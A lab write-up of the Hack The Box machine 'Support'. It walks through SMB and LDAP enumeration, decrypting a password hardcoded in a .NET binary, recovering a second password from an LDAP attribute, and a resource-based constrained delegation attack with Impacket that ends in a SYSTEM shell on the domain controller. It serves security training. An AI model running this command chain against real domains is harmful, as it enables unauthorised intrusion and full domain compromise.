# Support - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Support is a neat easy-rated HTB machine (Windows) created by [0xdf](https://twitter.com/0xdf_)

This box has an SMB share with guest access enabled. On the share, we can find a .NET executable which contains a set of credentials.  
We can use them to find another user's password in an LDAP attribute.  
For privilege escalation, we were expected to exploit `GenericAll` privileges to a computer, using Resource-based Constrained Delegation.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.174
Nmap scan report for 10.10.11.174
Host is up (0.33s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  unknown
49682/tcp open  unknown
49695/tcp open  unknown
56535/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49670,49682,49695,56535 -oN support.nmap 10.10.11.174
Nmap scan report for 10.10.11.174
Host is up (0.55s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-01 12:04:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  unknown
49695/tcp open  msrpc         Microsoft Windows RPC
56535/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-08-01T12:05:21
|_  start_date: N/A
|_clock-skew: -5s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
```

We have several ports open, including DNS, Kerberos, SMB, RPC, LDAP and WinRM.  

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -h 10.10.11.174 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=support,DC=htb
ldapServiceName: support.htb:dc$@SUPPORT.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=support,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
namingContexts: DC=support,DC=htb
namingContexts: CN=Configuration,DC=support,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
namingContexts: DC=DomainDnsZones,DC=support,DC=htb
namingContexts: DC=ForestDnsZones,DC=support,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 82028
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=support,DC=htb
dnsHostName: dc.support.htb
defaultNamingContext: DC=support,DC=htb
currentTime: 20220801121826.0Z
configurationNamingContext: CN=Configuration,DC=support,DC=htb
```

We have the FQDN `dc.support.htb` here; we can add it to `/etc/hosts`:

```text
10.10.11.174 support.htb dc.support.htb
```

## SMB enumeration

Now, we can enumerate SMB shares.  
Testing for null session:

```console
opcode@parrot$ smbmap -H 10.10.11.174 -u '' -p ''   
[+] IP: 10.10.11.174:445    Name: support.htb                                       
```

Testing for guest session:

```console
opcode@parrot$ smbmap -H 10.10.11.174 -u 'opcode' -p ''
[+] Guest session       IP: 10.10.11.174:445    Name: support.htb                                       
    Disk                                                  Permissions    Comment
    ----                                                  -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  READ ONLY    Remote IPC
    NETLOGON                                              NO ACCESS    Logon server share 
    support-tools                                         READ ONLY    support staff tools
    SYSVOL                                                NO ACCESS    Logon server share 
```

There's nothing special about read access to `IPC$`, but `support-tools` is not a default share.  
You need to retype entire commands with `smbmap`, so switch to `impacket`'s `smbclient.py`:

```console
opcode@parrot$ smbclient.py -no-pass support.htb/opcode@10.10.11.174      
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# use support-tools
# ls
drw-rw-rw-          0  Wed Jul 20 22:31:06 2022 .
drw-rw-rw-          0  Sat May 28 16:48:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 16:49:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 16:49:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 16:50:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 16:49:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Wed Jul 20 22:31:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 16:50:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 16:49:43 2022 WiresharkPortable64_3.6.5.paf.exe
```

All of these are well-known tools, except for `UserInfo.exe.zip`. It even has a different modification time.

```console
# get UserInfo.exe.zip
```

```console
opcode@parrot$ unzip UserInfo.exe.zip   
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe            
  inflating: CommandLineParser.dll   
  inflating: Microsoft.Bcl.AsyncInterfaces.dll  
  inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll  
  inflating: Microsoft.Extensions.DependencyInjection.dll  
  inflating: Microsoft.Extensions.Logging.Abstractions.dll  
  inflating: System.Buffers.dll      
  inflating: System.Memory.dll       
  inflating: System.Numerics.Vectors.dll  
  inflating: System.Runtime.CompilerServices.Unsafe.dll  
  inflating: System.Threading.Tasks.Extensions.dll  
  inflating: UserInfo.exe.config     
```

## Reversing .NET executable

```console
opcode@parrot$ file UserInfo.exe  
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
```

Since `UserInfo.exe` is a .NET executable, we can use dotPeek (<https://www.jetbrains.com/decompiler/>) to decompile it and get C# or IL code.  
The juicy parts are in the `UserInfo.Services` namespace. Here is the class `Protected`:

```cs
using System;
using System.Text;

namespace UserInfo.Services
{
  internal class Protected
  {
    private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
    private static byte[] key = Encoding.ASCII.GetBytes("armando");

    public static string getPassword()
    {
      byte[] numArray = Convert.FromBase64String(Protected.enc_password);
      byte[] bytes = numArray;
      for (int index = 0; index < numArray.Length; ++index)
        bytes[index] = (byte) ((int) numArray[index] ^ (int) Protected.key[index % Protected.key.Length] ^ 223);
      return Encoding.Default.GetString(bytes);
    }
  }
}
```

Seems like we have an "encrypted" password here. The key used is "armando", and the password has been encrypted with XOR  
We can write a quick python script to decrypt it:

```py
from base64 import b64decode
from itertools import cycle

ct = b'0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E'
key = b'armando'

password = [chr(a ^ b ^ 223) for a, b in zip(b64decode(ct), cycle(key))]
print(''.join(password))
```

```console
opcode@parrot$ python3 decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```

We got the password.  
We also have another class: `LdapQuery`:

```cs
    public LdapQuery()
    {
      this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", Protected.getPassword());
      this.entry.AuthenticationType = AuthenticationTypes.Secure;
      this.ds = new DirectorySearcher(this.entry);
    }
```

Hence, we also got the username `ldap`

We can use `kerbrute` to validate them.  
But before using any Kerberos tools, we should sync our system time to the box:

```console
opcode@parrot$ sudo ntpdate support.htb
```

Now,

```console
opcode@parrot$ echo "ldap" | ./kerbrute passwordspray --dc 10.10.11.174 -d support.htb -v - 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'            
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/10/22 - Ronnie Flathers @ropnop

2022/08/01 19:46:44 >  Using KDC(s):
2022/08/01 19:46:44 >    10.10.11.174:88

2022/08/01 19:46:45 >  [+] VALID LOGIN: ldap@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
2022/08/01 19:46:45 >  Done! Tested 1 logins (1 successes) in 0.492 seconds
```

It is valid!

## Extracting information from LDAP

For this step, I had to take hints. I was advised to extract the data corresponding to the user `support` from LDAP.  
I had already looked through the data generated by `BloodHound.py` (<https://github.com/fox-it/BloodHound.py>), but we had to look for an uncommon attribute which is apparently not pulled by `BloodHound.py`

We can list all users with the following:

```console
opcode@parrot$ ldapsearch -x -h 10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' dn -LLL       
dn: CN=Users,DC=support,DC=htb
dn: CN=krbtgt,CN=Users,DC=support,DC=htb
dn: CN=Domain Computers,CN=Users,DC=support,DC=htb
dn: CN=Domain Controllers,CN=Users,DC=support,DC=htb
[--SNIP--]
dn: CN=DnsUpdateProxy,CN=Users,DC=support,DC=htb
dn: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
dn: CN=ldap,CN=Users,DC=support,DC=htb
dn: CN=support,CN=Users,DC=support,DC=htb
dn: CN=smith.rosario,CN=Users,DC=support,DC=htb
dn: CN=hernandez.stanley,CN=Users,DC=support,DC=htb
dn: CN=wilson.shelby,CN=Users,DC=support,DC=htb
dn: CN=anderson.damian,CN=Users,DC=support,DC=htb
dn: CN=thomas.raphael,CN=Users,DC=support,DC=htb
dn: CN=levine.leopoldo,CN=Users,DC=support,DC=htb
dn: CN=raven.clifton,CN=Users,DC=support,DC=htb
dn: CN=bardot.mary,CN=Users,DC=support,DC=htb
dn: CN=cromwell.gerard,CN=Users,DC=support,DC=htb
dn: CN=monroe.david,CN=Users,DC=support,DC=htb
dn: CN=west.laura,CN=Users,DC=support,DC=htb
dn: CN=langley.lucy,CN=Users,DC=support,DC=htb
dn: CN=daughtler.mabel,CN=Users,DC=support,DC=htb
dn: CN=stoll.rachelle,CN=Users,DC=support,DC=htb
dn: CN=ford.victoria,CN=Users,DC=support,DC=htb
dn: CN=Administrator,CN=Users,DC=support,DC=htb
dn: CN=Guest,CN=Users,DC=support,DC=htb
```

We can query data for the user `support` with:

```console
opcode@parrot$ ldapsearch -x -h 10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=support,CN=Users,DC=support,DC=htb' -LLL
```

The user has an attribute `info`:

```console
opcode@parrot$ ldapsearch -x -h 10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=support,CN=Users,DC=support,DC=htb' info -LLL
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful
```

It is actually the password for this account. We can use `kerbrute` again to check:

```console
opcode@parrot$ echo "support" | ./kerbrute passwordspray --dc 10.10.11.174 -d support.htb -v - 'Ironside47pleasure40Watchful'
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/10/22 - Ronnie Flathers @ropnop

2022/08/02 20:31:58 >  Using KDC(s):
2022/08/02 20:31:58 >    10.10.11.174:88

2022/08/02 20:31:59 >  [+] VALID LOGIN: support@support.htb:Ironside47pleasure40Watchful
2022/08/02 20:31:59 >  Done! Tested 1 logins (1 successes) in 0.469 seconds
```

## Getting BloodHound to work

As far as Active Directory is concerned, there is no tool more useful than BloodHound (<https://github.com/BloodHoundAD/BloodHound>). We can use it to identify attack paths to compromise more privileged accounts.

But first, we'd have to install an ingestor. A python-based ingestor (<https://github.com/fox-it/bloodhound.py>) can be installed with:

```console
opcode@parrot$ python3 -m pip install bloodhound
```

We can use it to collect data:

```console
opcode@parrot$ bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c All --zip
```

It would create a zip file with several `json` documents. We can deliver this file to BloodHound, which would try to identify vulnerabilities.

We should go get the binary for BloodHound from <https://github.com/BloodHoundAD/BloodHound/releases> and unzip it.

But before we run it, we must fulfil a couple of requirements.

`neo4j` is a prerequisite for BloodHound, but the latest package from Parrot OS's repository is outdated.  
`OpenJDK` 11 is a prerequisite for the latest `neo4j`, but Parrot OS's repository installs `OpenJDK` 17  
As a result, the installation requires some more steps besides the `apt get install`

We need to create this file repository configuration first:

```console
opcode@parrot$ echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
```

Then install `OpenJDK` 11:

```console
opcode@parrot$ sudo apt-get update
opcode@parrot$ sudo apt-get install openjdk-11-jre
```

Now, we need to set this version to default:

```console
opcode@parrot$ sudo update-java-alternatives --jre --set java-1.11.0-openjdk-amd64
```

Import the signing key and create the repository configuration for `neo4j` next:

```console
opcode@parrot$ wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
opcode@parrot$ echo 'deb https://debian.neo4j.com stable latest' | sudo tee -a /etc/apt/sources.list.d/neo4j.list
```

We can now start `neo4j` with:

```console
opcode@parrot$ sudo neo4j console
```

On the first run, we need to visit <https://localhost:7474/> with the default credentials `neo4j:neo4j` and change the password.

Finally, we can run the BloodHound binary:

```console
opcode@parrot$ ./BloodHound
```

Once on the interface, we can select "Upload Data" and select the zip file generated by the ingestor.

## Identifying attack paths with BloodHound

Let us find out paths from the `support` account.  
We can search for `SUPPORT@SUPPORT.HTB` and mark it as owned.

We can then visit the analysis section and query "Shortest path from Owned Principals"  
Sadly, it would not find anything viable for this box.  
Instead, we can search for `SUPPORT@SUPPORT.HTB` again and manually look around in "Node Info".  
Under "OUTBOUND OBJECT CONTROL", we can click "Group Delegated Object Control".

![1](images/1.png)

There, we find that `SUPPORT@SUPPORT.HTB` is a member of the group: `SHARED SUPPORT ACCOUNTS@SUPPORT.HTB` and members of that group have `GenericAll` privileges to the computer `DC.SUPPORT.HTB`

![2](images/2.png)

## Resource-based Constrained Delegation

If we have `GenericAll` over a computer account, we can go for Resource-based Constrained Delegation.  
There are multiple tools to do it, but the most effortless approach is to use Impacket (<https://github.com/SecureAuthCorp/impacket>)

- Create a new machine account

  ```console
  opcode@parrot$ addcomputer.py -computer-name 'GLADOS$' -computer-pass 'TheCakeIsALie' -dc-ip 10.10.11.174 support.htb/support:Ironside47pleasure40Watchful
  Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

  [*] Successfully added machine account GLADOS$ with password TheCakeIsALie.
  ```

- Append the security descriptor of the machine account we created (`GLADOS$`), to the `DC$` computer's `msDS-AllowedToActOnBehalfOfOtherIdentity`

  ```console
  opcode@parrot$ rbcd.py -delegate-from 'GLADOS$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action write support.htb/support:Ironside47pleasure40Watchful
  Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

  [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
  [*] Delegation rights modified successfully!
  [*] GLADOS$ can now impersonate users on DC$ via S4U2Proxy
  [*] Accounts allowed to act on behalf of other identity:
  [*]     GLADOS$      (S-1-5-21-1677581083-3380853377-188903654-5101)
  ```

  We can verify that it worked:

  ```console
  opcode@parrot$ rbcd.py -delegate-to 'DC$' -dc-ip 10.10.11.174 -action read support.htb/support:Ironside47pleasure40Watchful
  Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

  [*] Accounts allowed to act on behalf of other identity:
  [*]     GLADOS$      (S-1-5-21-1677581083-3380853377-188903654-5101)
  ```

- Request impersonated Service Tickets (S4U) for the target computer:

  ```console
  opcode@parrot$ getST.py -spn cifs/DC.SUPPORT.HTB -impersonate Administrator -dc-ip 10.10.11.174 support.htb/GLADOS$:TheCakeIsALie
  Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

  [-] CCache file is not found. Skipping...
  [*] Getting TGT for user
  [*] Impersonating Administrator
  [*]   Requesting S4U2self
  [*]   Requesting S4U2Proxy
  [*] Saving ticket in Administrator.ccache
  ```

- Finally, use Kerberos authentication with `psexec.py` to get a shell:

  ```console
  opcode@parrot$ export KRB5CCNAME=Administrator.ccache
  opcode@parrot$ psexec.py -no-pass -k support.htb/administrator@dc.support.htb
  Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

  [*] Requesting shares on dc.support.htb.....
  [*] Found writable share ADMIN$
  [*] Uploading file oNwNvPYN.exe
  [*] Opening SVCManager on dc.support.htb.....
  [*] Creating service uXMj on dc.support.htb.....
  [*] Starting service uXMj.....
  [!] Press help for extra shell commands
  Microsoft Windows [Version 10.0.20348.859]
  (c) Microsoft Corporation. All rights reserved.

  C:\Windows\system32> whoami
  nt authority\system
  ```
